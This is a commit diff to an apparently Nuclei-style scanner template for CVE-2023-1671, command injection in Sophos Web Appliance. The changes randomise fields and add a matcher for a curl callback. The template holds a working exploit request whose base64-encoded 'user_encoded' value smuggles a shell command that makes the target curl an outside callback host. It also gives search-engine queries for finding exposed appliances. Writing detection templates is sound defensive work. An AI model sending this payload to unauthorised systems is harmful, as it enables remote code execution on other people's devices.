added matcher

cves/2023/CVE-2023-1671.yaml

@@ -15,12 +15,12 @@ info:
     cve-id: CVE-2023-1671
     cwe-id: CWE-77
   metadata:
+    verified: "true"
     fofa-query: title="Sophos Web Appliance"
     shodan-query: title:"Sophos Web Appliance"
-    verified: "true"
   tags: cve,cve2023,rce,sophos
 
-requests:
+http:
   - raw:
       - |
         POST /index.php?c=blocked&action=continue HTTP/1.1
@@ -28,10 +28,15 @@ requests:
         Content-Type: application/x-www-form-urlencoded
         User-Agent: curl/7.86.0
 
-        args_reason=filetypewarn&url=1671&filetype=11412&user=15824&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}
+        args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}
 
     matchers:
       - type: word
         part: interactsh_protocol
         words:
-          - "http"
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: curl"